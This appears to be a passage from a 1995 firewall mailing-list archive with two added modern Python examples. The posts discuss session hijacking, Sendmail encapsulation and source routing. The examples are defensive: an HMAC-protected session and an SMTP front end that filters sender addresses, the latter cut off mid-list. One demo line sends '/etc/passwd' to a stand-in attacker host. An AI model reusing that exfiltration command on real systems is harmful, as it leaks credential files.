>logged in to their system. It is better to rely on user -> firewall
>and/or firewall -> firewall encryption (using strong authentication,
>of course) than to rely on strong authentication only.
>

I've been told that most companies are piling their resources (buck) on the authentication and not using traffic encryption because they feel that session assumption is really more difficult than one would be led to believe and encryption represents considerable overhead. Any comments?

Thanks,
Bill

The opinions expressed here-in are my own. Any similarities between these opinions and those of any other person - living or not - including my employer are purely coincidental.
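The remark Bill quotes, that a strong login is worth little if the session can be taken over afterwards, is easy to see in a small simulation. The Python below is an added example written for this page, not code from any poster or product on the list; the one-time password, the session key and the command stream are constructed for the demonstration. Two toy servers demand the same one-time password at login. The first trusts everything that arrives afterwards, so a command injected into the connection by a third party is executed. The second binds each later command to a per-session key agreed at login (an HMAC over a sequence number and the command, the same shape as the per-packet integrity check a user-to-firewall encryption scheme provides), so the injected command fails verification.

```python
"""Added example (not from the thread): a strong login alone does not
protect the session that follows it.

Both toy servers demand a one-time password at login. auth_only_server()
trusts every later command on the connection. AuthenticatedChannelServer
requires each later command to carry an HMAC under a key established at
login, with a sequence number, so a command injected by someone who watched
the login but never learned the key is refused.

The OTP, the key and the command stream are constructed for the example.
"""
import hashlib
import hmac
import os

VALID_OTP = "7294-TRUCK-OWL"   # constructed one-time password


def auth_only_server(stream):
    """Authenticate once, then execute whatever arrives afterwards."""
    executed = []
    logged_in = False
    for cmd in stream:
        if not logged_in:
            if cmd.startswith("LOGIN ") and cmd[6:] == VALID_OTP:
                logged_in = True
            continue
        executed.append(cmd)           # cannot tell who sent this
    return executed


def mac_for(key, seq, cmd):
    """HMAC-SHA256 over (sequence number, command); seq defeats replay."""
    return hmac.new(key, seq.to_bytes(4, "big") + cmd.encode(),
                    hashlib.sha256).hexdigest()


class AuthenticatedChannelServer:
    """Same login, but every later command must verify under the session key."""

    def __init__(self):
        self.key = None
        self.expected_seq = 0
        self.executed = []
        self.rejected = []

    def login(self, otp, session_key):
        # In a real protocol the key comes out of a key exchange bound to
        # the authentication; here the caller supplies it.
        if otp == VALID_OTP:
            self.key = session_key
            return True
        return False

    def handle(self, seq, cmd, mac):
        ok = (self.key is not None
              and seq == self.expected_seq
              and hmac.compare_digest(mac, mac_for(self.key, seq, cmd)))
        if not ok:
            self.rejected.append(cmd)
            return False
        self.expected_seq += 1
        self.executed.append(cmd)
        return True


def demo():
    """A user logs in and sends two commands; an attacker injects a third.

    Returns (commands the auth-only server ran,
             commands the authenticated-channel server ran,
             commands the authenticated-channel server refused)."""
    login, cmd1, cmd2 = "LOGIN " + VALID_OTP, "LIST /home/alice", "MAIL alice"
    injected = "COPY /etc/passwd attacker@example.net"

    # Auth-only: the attacker waits for the login, then writes to the socket.
    naive_ran = auth_only_server([login, cmd1, injected, cmd2])

    # Authenticated channel: same injection, but the attacker has no key.
    srv = AuthenticatedChannelServer()
    key = os.urandom(32)
    srv.login(VALID_OTP, key)
    srv.handle(0, cmd1, mac_for(key, 0, cmd1))
    forged = mac_for(os.urandom(32), 1, injected)     # wrong key, right seq
    srv.handle(1, injected, forged)
    srv.handle(1, cmd2, mac_for(key, 1, cmd2))
    return naive_ran, srv.executed, srv.rejected


if __name__ == "__main__":
    print(demo())
```

The sequence number is what stops a recorded legitimate command from being replayed later; without it the MAC alone would still let an attacker resend "MAIL alice" at will. Encrypting the payload as well, as the quoted poster recommends, adds confidentiality on top of this integrity check, which is the part that actually defeats the takeover.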
From firewalls-owner Wed Sep 13 11:02:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA27578 for firewalls-outgoing; Wed, 13 Sep 1995 10:39:27 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA27571 for ; Wed, 13 Sep 1995 10:39:22 -0700 From: cjolley@iac.net Received: from 199.6.47.253 by little-miami.iac.net with SMTP id NAA03571; Wed, 13 Sep 1995 13:36:35 -0400 Message-Id: <199509131736.NAA03571@little-miami.iac.net> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Wed, 13 Sep 95 13:36:25 -0500 Subject: Re: MVS vs the world To: Barney Wolff , janken@rust.net (Kenneth J. Stephens), padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509131226.AA00415@databus.databus.com> X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 95, Barney Wolff wrote: >> Date: Wed, 13 Sep 1995 10:57:50 -0700 >> From: janken@rust.net (Kenneth J. Stephens) >> >> BCDIC open bracket = hex "4D" or binary "0100 1101" >> became >> EBCDIC open paren = hex "4D" or binary "0100 1101" >> >> BCDIC close bracket = hex "5D" or binary "0101 1101" >> became >> EBCDIC close paren = hex "5D" or binary "0101 1101" >> >> So say my green card. > >I know it's unofficial, but my dd translates [] to hex ad bd, so there >is a unique translation even for the brackets. > >It's quite a separate question what shows up on the screen of a genuine >3270 for some of these characters, or what gets printed. > >Bigotry in either direction is non-PC :-) > >Wonder how many of us still have our green cards (other than resident >aliens, of course)? I do. 
>
>Barney Wolff
>
>

I still have mine, but it does not explain what the following code does:

BALR 3,0

BALR 3,3

**** cjolley@iac.net
**** All opinions are my own and not necessarily those of my employer ****

From firewalls-owner Wed Sep 13 11:02:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA27154 for firewalls-outgoing; Wed, 13 Sep 1995 10:30:21 -0700
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA27130 for ; Wed, 13 Sep 1995 10:30:09 -0700
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id MAA14779 for ; Wed, 13 Sep 1995 12:49:48 -0500
Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id MAA14772 for ; Wed, 13 Sep 1995 12:49:47 -0500
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id MAA17915; Wed, 13 Sep 1995 12:29:00 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA20468; Wed, 13 Sep 1995 12:28:59 -0500
Date: Wed, 13 Sep 1995 12:28:59 -0500
From: Rick Smith
Message-Id: <199509131728.MAA20468@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: Secure version of Sendmail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> ..Sendmail is the only useful mail package out there. I'd be happy
> to adopt anything which offers me Sendmail functionality in a more secure
> fashion....

The best way to run Sendmail is to encapsulate it to stop the inevitable attacks. No version of Sendmail is "secure" against anything except *maybe* against previously patched vulnerabilities.

The "smap" wrapper is one encapsulation approach. But if smap suffers from a failure (note recent reports of potential syslog based vulnerabilities) then you're right back to where you started.
The more effective approach is to use some form of nonbypassable access control. This isolates the software components all the way to the bare metal. Attacks are limited to the encapsulated portion of the host and can be blocked from spilling over into your protected network. This requires a good, B level TCB or a Sidewinder with Type Enforcement.

The point is, you *can't* guarantee that a large, capable, general purpose package is bug free, whether the bugs are security oriented or anything else. So you need something to backstop it, like Type Enforcement or maybe MLS protections.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Wed Sep 13 12:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00880 for firewalls-outgoing; Wed, 13 Sep 1995 11:35:25 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA00872 for ; Wed, 13 Sep 1995 11:35:19 -0700
From: jet@abulafia.genmagic.com
Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA05205; Wed, 13 Sep 95 14:33:58 -0400
Date: Wed, 13 Sep 95 14:33:57 -0400
Message-Id: <9509131833.AA05205@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Subject: The end of MVS vs the world
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If this doesn't stop soon I'll start reposting parts of "Programming the Commodore PET", whining about PETSCII and ranting about why companies won't port their servers to 8 bit micros.

That, or I'll go into Amiga-owner persecution complex mode and ya'll will *really* be sorry: "I could run a firewall on my Amiga if you bastards would just port your code!"

-- J.
Eric Townsend vox #: USA 408.774.4252 work: jet@genmagic.com AT&T PersonaLink: A5803643645@attpls.net play: jet@well.sf.ca.us, http://www.spies.com/jet From firewalls-owner Wed Sep 13 12:03:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01599 for firewalls-outgoing; Wed, 13 Sep 1995 11:55:50 -0700 Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA01592 for ; Wed, 13 Sep 1995 11:55:45 -0700 Received: from [192.67.239.212] (franklin-tty12.jvnc.net) by tigger.jvnc.net with SMTP id AA27464 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 13 Sep 1995 14:54:22 -0400 Date: Wed, 13 Sep 1995 14:54:22 -0400 X-Sender: corecom@tigger.jvnc.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: dave@corecom.com (David M. Piscitello) Subject: Direct experience with Xyplex packet filtering? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Anyone have direct experience with Xyplex routers? Their marketing literature suggests they have rather extensive filtering capabilities. What we're looking for is a dual ethernet router that supports packet filtering in/out on IP SA/DA, PROTO, UDP/TCP port at min, anything more would be gravy. Please post replies directly to me. No marketing, just experience, please! Thanks, dave David M. Piscitello Core Competence, Inc. 
1620 Tuckerstown Road
Dresher, PA USA 19025
dave@corecom.com
1.215.830.0692

From firewalls-owner Wed Sep 13 13:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04821 for firewalls-outgoing; Wed, 13 Sep 1995 13:06:19 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA04814 for ; Wed, 13 Sep 1995 13:06:13 -0700
Received: from gaau.ga.mt.np.els-gms.att.net by relay4.UU.NET with SMTP id QQzhbc00409; Wed, 13 Sep 1995 16:05:11 -0400
Date: Wed, 13 Sep 1995 15:57:52 -0500
From: ufpsprod!gmyers@atlml1.attmail.com (MYERS)
Received: from atlml1 by attmail; Wed Sep 13 20:04 GMT 1995
Received: from ufpsprod by atlml1; Wed, 13 Sep 1995 15:58 EDT
Received: from ufps11.ufps by ufps.att.com (4.1/SMI-4.1) id AA13233; Wed, 13 Sep 95 15:57:53 EDT
Subject: MVS religious war, was MVS vs the world
To: firewalls@GreatCircle.COM
Message-Id: <9509131957.AA13233@ufps.att.com>
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Come on folks, what's the name of this list anyway? If I wanted to read all this MVS vs. anti-MVS crap, I'd read some newsgroup called:

alt.wasted.bandwidth.MVS.vs.anti-MVS

Let's face it.

for OS in $( wrote:
} >> Date: Wed, 13 Sep 1995 10:57:50 -0700
} >> From: janken@rust.net (Kenneth J. Stephens)
} >>
} >> BCDIC open bracket = hex "4D" or binary "0100 1101"
} >> became
} >> EBCDIC open paren = hex "4D" or binary "0100 1101"
} >>
} >> BCDIC close bracket = hex "5D" or binary "0101 1101"
} >> became
} >> EBCDIC close paren = hex "5D" or binary "0101 1101"
} >>
} >> So say my green card.
} >
} >I know it's unofficial, but my dd translates [] to hex ad bd, so there
} >is a unique translation even for the brackets.
} >
} >It's quite a separate question what shows up on the screen of a genuine
} >3270 for some of these characters, or what gets printed.
} > } >Bigotry in either direction is non-PC :-) } > } >Wonder how many of us still have our green cards (other than resident } >aliens, of course)? I do. } > } >Barney Wolff } > } > } } I still have mine, but it does not explain what the following code does: } } BALR 3,0 } } BALR 3,3 } **** cjolley@iac.net } **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed Sep 13 14:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06012 for firewalls-outgoing; Wed, 13 Sep 1995 13:38:19 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA06003 for ; Wed, 13 Sep 1995 13:38:15 -0700 Received: from pm3-01.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA21430; Wed, 13 Sep 95 15:34:49 -0400 Date: Wed, 13 Sep 95 15:34:49 -0400 Message-Id: <9509131934.AA21430@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Bill Husler From: frankw@in.net (Frank Willoughby) Subject: Re: User Authentication Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was surfing on the net one day and stumbled onto one with a slick user I/F where you can watch the net traffic & just hit a key to take over the session. I'll have to dig up where I saw it (I had to re-install Netscape & lost my bookmarks). 8^( I think the commercial version is available for a couple of hundred dollars. Authentication (even encrypted one-time pad authentication) alone isn't worth much. Strong authentication *plus* solid encryption is what I would recommend to anyone who is serious about protecting their company from the hazards of connecting to the Internet. I would look for fully encrypted links. 
>From the what-it's-worth department - When I was doing a firewall evaluation a while ago, the only firewall vendor that had a solid authentication/encryption scheme was V-ONE. They had user-friendly fully-encrypted links (user->firewall & firewall->firewall). Virtually transparent to the users too. If I remember right, their number was (301) 838-8900. But, I digress... Best Regards, Frank >>Any hacker worth their salt will let the user long in using strong >>authentication and then take over the session after the user has >>logged in to their system. It is better to rely on user -> firewall >>and/or firewall -> firewall encryption (using strong authentication, >>of course) than to rely on strong authentication only. >> >I've been being told that most companies are piling their resources >(buck) on the authentication and not using traffic encryption because >they feel that session assumptions is really more difficult that one >would be lead to believe and encryption represents considerable overhead. >Any comments? >Thanks, >Bill > >The opinions expressed here-in are my own. Any similarities between these >opinions and those of any other person - living or not - including my >employer are purely coincidental. 
From firewalls-owner Wed Sep 13 14:32:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07434 for firewalls-outgoing; Wed, 13 Sep 1995 14:24:55 -0700
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07427 for ; Wed, 13 Sep 1995 14:24:51 -0700
Received: from pm3-25.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA23532; Wed, 13 Sep 95 16:22:57 -0400
Date: Wed, 13 Sep 95 16:22:57 -0400
Message-Id: <9509132022.AA23532@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: RE: Xyplex
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Dave,

My mail to you bounced. Your gateway didn't like the address you supplied. E-mail me & I'll reply.

Best Regards,

Frank

From firewalls-owner Wed Sep 13 14:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06955 for firewalls-outgoing; Wed, 13 Sep 1995 14:09:27 -0700
Received: from ic.co.at (ic.co.at [193.81.168.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA06948 for ; Wed, 13 Sep 1995 14:09:21 -0700
Received: from ic.co.at (ic.co.at [193.80.224.9]) by ic.co.at (8.7.Beta.14/8.7.Beta.14) with SMTP id XAA13481 for ; Wed, 13 Sep 1995 23:11:56 -0100
Date: Wed, 13 Sep 1995 23:11:55 -0100 (GMT-0100)
From: Michael Haberler
To: firewalls@greatcircle.com
Subject: IP source routed traffic - how to generate?
In-Reply-To: <11D946E99@lce.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm looking for tools to generate TCP connections or UDP with source routed IP packets for reasonably popular platforms. Any hints?

-michael

ps: No, I'm not a loonie from alt.2600, I want to quality-check our own work.
But then, that's what these guys probably also would say..

Michael Haberler mah@eunet.co.at EUnet Austria Ltd MH182
A-1090 Vienna, Austria, Thurngasse 8/16 Tel: +43 (1) 31376 fax: +43 (1) 3106926

From firewalls-owner Wed Sep 13 14:34:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06345 for firewalls-outgoing; Wed, 13 Sep 1995 13:47:25 -0700
Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA06338 for ; Wed, 13 Sep 1995 13:47:21 -0700
Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id PAA17393; Wed, 13 Sep 1995 15:43:10 -0400
Date: Wed, 13 Sep 1995 15:43:10 -0400
From: Ted Doty
Message-Id: <199509131943.PAA17393@kgbvax.network.com>
To: bhusler@community.net, firewalls@greatcircle.com
Subject: Re: User Authentication
In-Reply-To: Mail from 'Bill Husler ' dated: Wed, 13 Sep 1995 10:01:36 -0700
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bill Husler writes:
> I've been told that most companies are piling their resources
> (buck) on the authentication and not using traffic encryption because
> they feel that session assumption is really more difficult than one
> would be led to believe and encryption represents considerable overhead.

Any decent PC should be able to run DES much faster than the internet feed can take the bits (not that this is really saying much). DES is well understood, and IPSec clearly defines what is needed. Look for several implementations being interoperability-tested soon.

The real problem is the ITAR. If I have to sell my foo-widget IP stack for Windoze for $159, I can't afford to license each copy. However, I can probably implement IPSec with only MD5 and Photuris, and sell it shrink-wrapped in Berlin.

It's not a technical (or performance) issue.
--
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation | phone: +1 301 596-2270
8965 Guilford Road, Suite 250 | fax: +1 410 381-3320
Columbia, MD, 21046 USA | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Wed Sep 13 15:01:39 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07067 for firewalls-outgoing; Wed, 13 Sep 1995 14:13:37 -0700
Received: from venera.isi.edu (venera.isi.edu [128.9.0.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07058 for ; Wed, 13 Sep 1995 14:13:33 -0700
From: bmanning@ISI.EDU
Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Wed, 13 Sep 1995 14:12:09 -0700
Posted-Date: Wed, 13 Sep 1995 14:09:16 -0700 (PDT)
Message-Id: <199509132109.AA02720@zed.isi.edu>
Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Wed, 13 Sep 1995 14:09:16 -0700
Subject: Re: source routing
To: R@lce.org
Date: Wed, 13 Sep 1995 14:09:16 -0700 (PDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <11D946E99@lce.org> from "R@lce.org" at Sep 13, 95 11:15:24 am
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 996
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Sorry about the changed subject line but I had already deleted a
> short thread earlier, someone was asking for a program that could
> produce source routed packets to use in testing against a firewall.
> While looking around windows 95 I found that traceroute (tracert.exe)
> and ping (ping.exe) both claim in their usage blurb to be able to do
> loose source routing, ping also claims strict source routing.
> The
> programs aren't in the on-line help and are barely mentioned in the
> very thick and so far useless book with the resource kit. My guess is
> these came out of windows nt and would presumably be documented
> there. Anyone know?
>
> Ramon
>

Er, No. PING and traceroute are/were developed as internet troubleshooting tools and are in the Public Domain. MicroSoft simply ported them, since they are used in wide area networking for support purposes. They are -NOT- microsoft code nor products, other than the work needed to port them to this OS.

--
--bill

From firewalls-owner Wed Sep 13 15:02:59 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA08391 for firewalls-outgoing; Wed, 13 Sep 1995 14:56:25 -0700
Received: from flying.fish.com (flying.fish.com [140.174.97.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA08382 for ; Wed, 13 Sep 1995 14:56:21 -0700
Received: (from zen@localhost) by flying.fish.com (8.7.1.3 (Alpha)/8.7.1.3) id OAA21435; Wed, 13 Sep 1995 14:53:43 -0700
Date: Wed, 13 Sep 1995 14:53:43 -0700
From: d
Message-Id: <199509132153.OAA21435@flying.fish.com>
To: firewalls@greatcircle.com
In-reply-to: ufpsprod!gmyers@atlml1.attmail.com's message of 13 Sep 1995 14:04:49 -0700
Subject: Re: MVS religious war, was MVS vs the world
Organization: Vicious Fishes
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Let's face it.
> for OS in $( print $OS people are going to defend $OS operating system....
> done

Ahem.
Surely you mean: for $OS (keys %list_of_OS) { print "$OS people will defend $list_of_OS{$OS} operating system...\n"; } -- d From firewalls-owner Wed Sep 13 15:24:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA08547 for firewalls-outgoing; Wed, 13 Sep 1995 14:59:30 -0700 Received: from gatekeeper.alcatel.com.au (gatekeeper.alcatel.com.au [203.17.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA08540 for ; Wed, 13 Sep 1995 14:59:26 -0700 Received: from 139.188.22.50 (139.188.22.50) by gatekeeper.alcatel.com.au (PMDF V5.0-4 #11861) id <01HV9C0OOS6O0000DU@gatekeeper.alcatel.com.au> for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:56:35 +1000 Received: from gsms01.alcatel.oz.au (gsms01.alcatel.oz.au) by cbd.alcatel.oz.au (PMDF V5.0-3 #9241) id <01HV9C224AOG9OD9YN@cbd.alcatel.oz.au> for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:57:42 +1000 Received: (from jeremyp@localhost) by gsms01.alcatel.oz.au (8.6.12/8.6.12) id HAA07541 for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:57:54 +1000 Date: Thu, 14 Sep 1995 07:57:54 +1000 From: Peter Jeremy Subject: Re: The end of MVS vs the world To: firewalls@greatcircle.com Message-id: <199509132157.HAA07541@gsms01.alcatel.oz.au> Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk J. Eric Townsend writes: >If this doesn't stop soon I'll start reposting parts of "Programming >the Commodore PET", whining about PETSCII and ranting about why >companies won't port their servers to 8 bit micros. We have previously covered how to build a firewall out of a VIC-20. A similar approach would be quite applicable for a PET. In fact, the PET was large enough that you could probably cleanly mount the BNC's through the case, rather than just using electrical tape :-). >That, or I'll go into Amiga-owner persecution complex mode Wonderful machine. M$ are only now implementing some of the features that the Amiga had 10 years ago. 
> "I could run a firewall on my Amiga if you
>bastards would just port your code!"

If you have an '030 or better, you can always run Amix, Minix, Linux and at least one of the *BSD's.

There's no reason why you couldn't add a TCP/IP stack to AmigaDOS though - create a TCP: device and mount it. You then open TCP:123.123.123.123.25 for SMTP to [123.123.123.123] etc. The AmigaDOS/Exec approach to devices is much cleaner than most other OS's.

Note that I don't think that AmigaDOS would make a good base for a firewall because of its lack of process protection. (Who remembers the PDP-11 MMU discussion in comp.os.minix?)

Peter.

From firewalls-owner Wed Sep 13 15:30:39 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA09672 for firewalls-outgoing; Wed, 13 Sep 1995 15:25:12 -0700
Received: from interlock.mckesson.com (interlock.mckesson.com [199.221.43.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA09658 for ; Wed, 13 Sep 1995 15:25:07 -0700
Received: from [128.1.53.158] (billhost.mckesson.com) by interlock.mckesson.com with SMTP id AA08429 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 15:23:14 -0700
Date: Wed, 13 Sep 1995 15:23:14 -0700
Message-Id: <199509132223.AA08429@interlock.mckesson.com>
Subject: Re: MVS vs the world
From: Bill Husler
To: "Barney Wolff" , "Kenneth J. Stephens" , "A. Padgett Peterson, P.E. Information Security" ,
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Wonder how many of us still have our green cards (other than resident
>aliens, of course)? I do.
>
>Barney Wolff
>

I gave up my green card over a decade ago. Of course that was in favor of the yellow book (GX20-1850-5).

Bill

The opinions expressed here-in are my own. Any similarities between these opinions and those of any other person - living or not - including my employer are purely coincidental.
From firewalls-owner Wed Sep 13 16:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12340 for firewalls-outgoing; Wed, 13 Sep 1995 16:22:09 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12330 for ; Wed, 13 Sep 1995 16:22:06 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id SAA29883 for GreatCircle.COM!firewalls; Wed, 13 Sep 1995 18:12:11 -0500 Received: by ris1.nmti.com (smail2.5) id AA14210; 13 Sep 95 17:30:39 CDT (Wed) Received: by sonic.nmti.com; id AA09837; Wed, 13 Sep 1995 17:57:13 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509132257.AA09837@sonic.nmti.com.nmti.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Wed, 13 Sep 1995 17:57:13 -0500 (CDT) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 338 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The point is, you *can't* guarantee that a large, capable, general > purpose package is bug free, whether the bugs are security oriented or > anything else. So you need something to backstop it, like Type > Enforcement or maybe MLS protections. Of course a class B operating system is itself a large, capable, general purpose package. 
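Rick Smith's point about encapsulating Sendmail behind something small, and Peter da Silva's reply that the backstop is itself a large program, can be made concrete with the shape of such a front end. What follows is an added example written for this page in Python; it is not smap, not Sendmail and not any Secure Computing product. It accepts the SMTP dialogue, enforces a deliberately narrow grammar on the only attacker-controlled fields it passes on (envelope addresses and message body) and writes a spool record for a separate delivery stage, so the large MTA never reads from the network. The recipient limit and the address grammar are this example's own choices, not taken from any RFC or product.

```python
"""Added example (not smap, not Sendmail): a minimal SMTP front end that
sits between the network and a large MTA. It accepts the dialogue, applies a
narrow grammar to the only attacker-controlled fields it passes on (envelope
addresses and body) and writes a spool record for a separate delivery stage,
so the big MTA never talks to the network. Limits and grammar are this
example's own choices."""
import re

MAX_RCPT = 100
# Letters, digits and . _ + - only: no quoting and none of the '|', '!' or
# ':' forms that older MTAs were willing to treat as programs or routes.
ADDR_RE = re.compile(r"^[A-Za-z0-9._+\-]{1,64}@[A-Za-z0-9.\-]{1,255}$")


def parse_path(arg, keyword):
    """'FROM:<addr>' / 'TO:<addr>' -> addr, '' for a null sender, or None."""
    prefix = keyword + ":"
    if not arg.upper().startswith(prefix):
        return None
    path = arg[len(prefix):].strip()
    if not (path.startswith("<") and path.endswith(">")):
        return None
    addr = path[1:-1]
    if addr == "" and keyword == "FROM":
        return ""                       # bounces use an empty reverse path
    return addr if ADDR_RE.match(addr) else None


class SmtpFrontEnd:
    """One connection: feed() lines without CRLF, collect spool records."""

    def __init__(self):
        self.spool = []       # dicts with "from", "to", "body"
        self.refused = []     # (line, reason) pairs
        self._reset()

    def _reset(self):
        self.mail_from, self.rcpts, self.in_data, self.body = None, [], False, []

    def feed(self, line):
        """Process one line and return the SMTP reply code."""
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return 250
        if verb == "MAIL":
            addr = parse_path(arg, "FROM")
            if addr is None:
                self.refused.append((line, "bad sender"))
                return 501
            self.mail_from = addr
            return 250
        if verb == "RCPT":
            addr = parse_path(arg, "TO")
            if addr is None or self.mail_from is None or len(self.rcpts) >= MAX_RCPT:
                self.refused.append((line, "bad recipient"))
                return 501
            self.rcpts.append(addr)
            return 250
        if verb == "DATA":
            if not self.rcpts:
                return 503
            self.in_data = True
            return 354
        self.refused.append((line, "unknown verb"))
        return 500

    def _data_line(self, line):
        if line == ".":                 # end of message: hand off to the spool
            self.spool.append({"from": self.mail_from, "to": list(self.rcpts),
                               "body": "\n".join(self.body)})
            self._reset()
            return 250
        if line.startswith(".."):
            line = line[1:]             # undo dot-stuffing
        self.body.append(line)
        return 354


def run_session(lines):
    """Feed a whole session; return (front end, list of reply codes)."""
    fe = SmtpFrontEnd()
    return fe, [fe.feed(line) for line in lines]


# Constructed session: one legitimate message, then a "pipe to a program"
# sender of the kind that must be refused before any MTA sees it.
SAMPLE_SESSION = [
    "HELO relay.example.org",
    "MAIL FROM:<alice@example.org>",
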